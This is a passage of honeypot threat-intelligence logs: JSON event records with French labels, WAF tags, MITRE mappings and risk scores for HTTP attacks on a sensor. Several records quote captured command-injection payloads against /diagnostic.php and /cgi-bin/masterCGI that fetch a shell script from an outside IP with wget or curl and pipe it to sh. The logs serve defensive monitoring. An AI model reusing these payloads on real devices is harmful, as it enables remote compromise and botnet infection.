\u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022]","anomalies":"[]","severity":10,"bytes_in":332},{"id":11809369,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":55352,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":41,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/diagnostic.php","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022php\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00220b165bcd0084116a55970e964cd92616df411a98\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 376, \u0022payload_entropy\u0022: 5.230069750707045, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 10, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022b540d249d76021e7ef210951e095579ac9e91b97\u0022, \u0022event_fingerprint\u0022: \u0022a881b0949cf163913347d7a7269b150b9b12dd20\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022dc323c18ba3f35f13e2cd3d1e552c2c7\u0022, \u0022path_pattern_hash\u0022: \u0022918c7cd9de3921c3a9cf2fd44c04b514\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/diagnostic.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Length: 218\\r\\nConnection: close\\r\\n\\r\\nact=ping\u0026dst=%26%20cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusybo\u0022, \u0022payload_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/diagnostic.php\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Length: 218\\r\\nConnection: close\\r\\n\\r\\nact=ping\u0026dst=%26%20cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20ddiag%3Bbusybo\u0022, \u0022payload_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00225c20c6fbb5e1bf367a75964ba28b3a88dc59fa27\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/diagnostic.php\u0022, \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/diagnostic.php\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Cmdi\u0022, \u0022pat-0146\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/diagnostic.php\u0022, \u0022request_line\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/diagnostic.php\u0022, \u0022evidence_snippet\u0022: \u0022POST \/diagnostic.php HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8\\r\\nContent-Leng\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":376},{"id":11809370,"ip":"45.153.34.219","ts":"2026-07-14 02:18:15.000000","proto":"tcp","src_port":55358,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":47,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 2, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u0022daeda2ae79a1c94f294763a7a4e3a3b7695e64a6\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 296, \u0022payload_entropy\u0022: 5.187305596861115, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 13, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u002273fa7ce17e38c1f5ee466dacdbd97b65e1156a2f\u0022, \u0022event_fingerprint\u0022: \u002283a2bd0ec34f1f76122a843e7140b4d3dcb0dabd\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u002242fd74851afc42c87adebee806f4b184\u0022, \u0022path_pattern_hash\u0022: \u00229dbe1efebb97f3b2ef3472eff039ee1f\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022query_string\u0022: \u0022ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022query_string\u0022: \u0022ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel;\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20alcatel; HTTP\/1.1\\r\\nHo\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a6fe94edf2ee6cad98a3b2d7c1f6873eca47440e\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20al\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bcurl%20http\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/masterCGI?ping=nomip\u0026user=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20alcatel%3Bbusybox%20\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, 